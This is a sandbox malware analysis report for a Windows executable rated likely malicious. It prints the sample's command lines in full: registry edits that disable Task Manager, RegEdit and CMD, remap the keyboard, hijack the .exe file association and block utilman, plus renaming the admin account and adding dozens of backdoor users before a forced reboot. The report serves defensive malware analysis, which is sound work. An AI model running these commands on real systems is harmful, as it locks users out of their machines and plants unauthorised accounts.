Analysis Overview
SHA256
b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f
Threat Level: Likely malicious
The file b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe was found to be: Likely malicious.
Malicious Activity Summary
Event Triggered Execution: Image File Execution Options Injection
Disables RegEdit via registry modification
Disables Task Manager via registry modification
Checks computer location settings
Drops file in System32 directory
Sets desktop wallpaper using registry
Enumerates physical storage devices
Unsigned PE
Event Triggered Execution: Accessibility Features
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies registry class
Runs net.exe
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-18 02:33
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-18 02:33
Reported
2024-10-18 02:33
Platform
win7-20241010-en
Max time kernel
4s
Max time network
5s
Command Line
Signatures
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\system32\reg.exe | N/A |
Disables Task Manager via registry modification
Event Triggered Execution: Image File Execution Options Injection
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "NUL" | C:\Windows\system32\reg.exe | N/A |
Drops file in System32 directory
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\System32\\Microsoft\\Protect\\Defender.Update\\img000.png" | C:\Windows\system32\reg.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Accessibility Features
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler | C:\Windows\System32\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell | C:\Windows\System32\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open | C:\Windows\System32\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open\Command | C:\Windows\System32\cmd.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open\Command\ = "wscript.exe \"C:\\Windows\\System32\\Microsoft\\Protect\\Defender.Update\\aplicaciones.vbs\" \"\" " | C:\Windows\System32\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.exe | C:\Windows\System32\cmd.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "VBSExeHandler" | C:\Windows\System32\cmd.exe | N/A |
Runs net.exe
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe
"C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs"
C:\Windows\System32\cmd.exe
cmd /c ""C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd" "
C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 0000000000000071000000000000010000003b0000003c0000003d0000003e0000003f0000004000000041000000420000004300000044000000570000005800000037e000004600000052e0000047e0000049e0000051e000004fe0000053e0000048e000004be0000050e000004de00000520000005300000051000000500000004f0000004b0000004c0000004d0000004e0000004900000048000000470000004500000035e00000370000004a0000002900000002000000030000000400000005000000060000000700000008000000090000000a0000000b0000000c0000000d0000000f0000001000000011000000130000001600000017000000190000001a0000001b0000002b000000280000002700000026000000250000002400000022000000210000003a0000002a0000001d0000005be00000380000002c0000002d0000002e0000002f0000003000000032000000330000003400000035000000360000001de000005de000005ce0000038e000005900000065e0000021e000006be000005ee000005fe000006ae0000069e0000068e0000067e0000032e000006ce000006de0000066e0000020e000002ee000002ce0000030e0000019e0000010e0000024e0000022e0000000 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /f
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v UseDefaultTile /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "NUL" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png" /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayLastUserName /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayUserName /t REG_DWORD /d 3 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\System32\Wbem\WMIC.exe
wmic useraccount where name='Admin' rename "YOU ARE THE NEXT"
C:\Windows\system32\net.exe
net user "YOU ARE THE NEXT" "im dead"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user "YOU ARE THE NEXT" "im dead"
C:\Windows\system32\net.exe
net user T3yZrQ Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user T3yZrQ Maxcheto /add
C:\Windows\system32\net.exe
net user 8rJpX1 Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 8rJpX1 Maxcheto /add
C:\Windows\system32\net.exe
net user 9MaL2Z Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 9MaL2Z Maxcheto /add
C:\Windows\system32\net.exe
net user K4$dF27 Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user K4$dF27 Maxcheto /add
C:\Windows\system32\net.exe
net user xC78RT Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user xC78RT Maxcheto /add
C:\Windows\system32\net.exe
net user 3nL9$p2x Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 3nL9$p2x Maxcheto /add
C:\Windows\system32\net.exe
net user X7hbQ5Z Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user X7hbQ5Z Maxcheto /add
C:\Windows\system32\net.exe
net user R2xD1B Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user R2xD1B Maxcheto /add
C:\Windows\system32\net.exe
net user m14T8z Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user m14T8z Maxcheto /add
C:\Windows\system32\net.exe
net user L27w8G Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user L27w8G Maxcheto /add
C:\Windows\system32\net.exe
net user P9dR2Y Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user P9dR2Y Maxcheto /add
C:\Windows\system32\net.exe
net user 5QL71t Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 5QL71t Maxcheto /add
C:\Windows\system32\net.exe
net user r8B6V3F Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user r8B6V3F Maxcheto /add
C:\Windows\system32\net.exe
net user 7CXz1b Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 7CXz1b Maxcheto /add
C:\Windows\system32\net.exe
net user n38vJQ Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user n38vJQ Maxcheto /add
C:\Windows\system32\net.exe
net user x6G7P1L Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user x6G7P1L Maxcheto /add
C:\Windows\system32\net.exe
net user M239Wk Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user M239Wk Maxcheto /add
C:\Windows\system32\net.exe
net user 7F2hY4Z Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 7F2hY4Z Maxcheto /add
C:\Windows\system32\net.exe
net user 8QrB1L7 Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 8QrB1L7 Maxcheto /add
C:\Windows\system32\net.exe
net user t93V6D Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user t93V6D Maxcheto /add
C:\Windows\system32\net.exe
net user 5tG2Q8J Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 5tG2Q8J Maxcheto /add
C:\Windows\system32\net.exe
net user x9K1P7L Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user x9K1P7L Maxcheto /add
C:\Windows\system32\net.exe
net user z7R4M3 Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user z7R4M3 Maxcheto /add
C:\Windows\system32\shutdown.exe
shutdown /r /f /t 0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
Network
Files
C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs
| MD5 | 7c652236d1e09a76cfc27cb2611b80ad |
| SHA1 | f9c359054835b06308165e110cdc5229d4fda8fb |
| SHA256 | 4026d4567c422a1281580654d5592d5ce00fce125d8565b7c00ac5f7eb712e4c |
| SHA512 | 6a283c0428b91fbc39efbea2c3a793d89de1ae46451acf2c376c8b9b64c946ffa9ec9d83cc154d1647949e2cad79b2de2e3d655286d94ab52089734a92f943fe |
C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd
| MD5 | 7835d8ae389b8b78ea4d06c024d63849 |
| SHA1 | 5a0196e67a8af7185b372aacf5ad817a26546ad1 |
| SHA256 | 029a47eb246a5d4aa21b9a4ccaffc5103c5d93cd8955869d62d04e4f75612fd1 |
| SHA512 | 3b5c9ef7a6ec79983475b78e52b0e2c5d059cbcfd6b40832ddad067ed3fbf648507836664d489553372da6bfecc2c697b51b3ec57e5aa4d2939707bfc90c9372 |
C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png
| MD5 | 44055016d847ddbd0e8f0a56ea2a0ba6 |
| SHA1 | cb4e3dfdb804aebb78c96100b42b29db28d902cd |
| SHA256 | 2fa62a6d8816d3a7f45a371449ef044851556f6d38fc5030be3f58a25ccbd7f2 |
| SHA512 | 3edee078f8221c4ff1da59215dcc8e2144db74c5679e386645c3c3a34038cc23f11f83ba86efeeb94f3b01ec90dc72d83da1a09c91cb0cb02d8019c5d226b9c4 |
C:\Windows\System32\Microsoft\Protect\Defender.Update\user-32.png
| MD5 | 4947724257526b4226e21ae7541822cd |
| SHA1 | af4db735de48a5069e70758bdfdf41a8214aa346 |
| SHA256 | 19fbde1e1c5489c3cabc0dcd408f43b789a2e2f89af03a1d4466e55ab1a1faba |
| SHA512 | 52986bdd6a21ae6c5c375a8142bb7cd758d537923e8427f0d6fce0763299306a720163246bd2808a1566c3422caefaa28d3d046f2a466baba3305c51d7ff8902 |
C:\Windows\System32\Microsoft\Protect\Defender.Update\user-40.png
| MD5 | 2f368b76ab153329fb42db70493474b1 |
| SHA1 | 4c4752399ee2678f6cf4d67affca9dcba59d0023 |
| SHA256 | ae8f3768cf4e3af37ad6efedff11f7f2aa6af91239c175a04c1c366b56b8c35f |
| SHA512 | adccaad355c71376490d5d21d788b3921db7c08291c8ef4066ced9c8cf99d188307da49f53fa987ecddd88f9c2b6c191969ad2d34b016aadefac5afd88dc4c6a |
C:\Windows\System32\Microsoft\Protect\Defender.Update\user-48.png
| MD5 | 9ef9685c5a578bfdceccaedb0d5fa519 |
| SHA1 | 713f8621414772eee6602f9fa9ee0a3528d62057 |
| SHA256 | 6c118f5c5e4cf755ec5da06033a29faf53911c522f5aa3de2da2ae8944a87746 |
| SHA512 | 2238ee61a60358f5dfb003fbc69099cea7f62ad88f57c4629f022792d6257fef6928df5e613df152258475d1d49aaad6ae24119d1a67a86e0cdf96aafabbddfb |
C:\Windows\System32\Microsoft\Protect\Defender.Update\user-192.png
| MD5 | f346c440007285aff13e1e0512608862 |
| SHA1 | 4b4a44bc30d37c66dea948bd406effc2bcc63775 |
| SHA256 | 2f2c6c5d8f57b0816cbf1d8db47d0735951f1d1cbf8d562046677391bac23901 |
| SHA512 | 34fd2d6734f3825496d3f8d36057832c39052a0cda05efdc44e2d94f45f8b710da790fda4882bfa1eeb3a9971c5207a6a5a567ec4949cd47fd8efbe95f35f032 |
C:\Windows\System32\Microsoft\Protect\Defender.Update\user.png
| MD5 | 1db691b8c60c5f82f3dae2df999c1c7c |
| SHA1 | c252d4a6e065ab5b122f0ae43f6abdbaad49d80e |
| SHA256 | f2669088bebce7d2624993500bc63677dc1a96a1d733c1df88feff17954b201d |
| SHA512 | 3629aaf9e5c40f86c8bdcbfd462a80af19cb883ab2e4b3e3b62f661bedd7c40f4254ae9f274cbd96f3cac2d156cc3a1e5bb3b649bb0df99ecbd93a8ca65330c7 |
C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.png
| MD5 | 908587d867cd053293e2106d70cf42f3 |
| SHA1 | 83ffc3fc7f61d972b41347ff783a29b41bf13087 |
| SHA256 | f622a9159e4b2e792ac772bfc2cfc0ea6c890bad7f7273c916418ce3d425e444 |
| SHA512 | 541b65da137ed37139146ce27aaaee58dac29892c43b39eb0a0a793ed2d868ca8e24bfe836b133e8941ac72ba8a3e1f6a80e04d30b6dea87846cf86129fda5e8 |
C:\ProgramData\Microsoft\User Account Pictures\user.bmp
| MD5 | 40e2162dfc51fded60ea7b1de3acf588 |
| SHA1 | 3c0b932a845027db10e67c47c0c9cd45fa80ecbb |
| SHA256 | d0d3a8fd4d52042486c2ff093ca64e99fa54b256a7c551f20a6c3f53f569fbf7 |
| SHA512 | 453aea922c4801dc7f7defae4be326158abef053a61518f3a7e1d32118130f8f1dc18945c783e20c5b52e4d698613c7ff715ec17e01b5166acc5f380a156047a |
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Windows\System32\Microsoft\Protect\Defender.Update\YA.NO.LO.PUEDES.RECUPERAR.txt
| MD5 | e3a317c88b65b975be8e1c21e149f16d |
| SHA1 | 6e7a24a1146ba2800bf0c56ef5b17ea32b01f019 |
| SHA256 | b21c998e4c7258fd24a27f0be4d0ddbdcf95a9f2d7b4f041727e241578a410c0 |
| SHA512 | 1d1228f0f297867b6b134ff8fe5cd493929103098a07beb0edbd63957423dc8536092482d7a061072398bf26e8a5e6a5b3e6fc67439d934671433f4b01208044 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-18 02:33
Reported
2024-10-18 02:33
Platform
win10v2004-20241007-en
Max time kernel
5s
Max time network
8s
Command Line
Signatures
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\system32\reg.exe | N/A |
Disables Task Manager via registry modification
Event Triggered Execution: Image File Execution Options Injection
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "NUL" | C:\Windows\system32\reg.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops file in System32 directory
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\System32\\Microsoft\\Protect\\Defender.Update\\img000.png" | C:\Windows\system32\reg.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Accessibility Features
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "5" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open\Command\ = "wscript.exe \"C:\\Windows\\System32\\Microsoft\\Protect\\Defender.Update\\aplicaciones.vbs\" \"\" " | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.exe | C:\Windows\system32\cmd.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "VBSExeHandler" | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open\Command | C:\Windows\system32\cmd.exe | N/A |
Runs net.exe
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
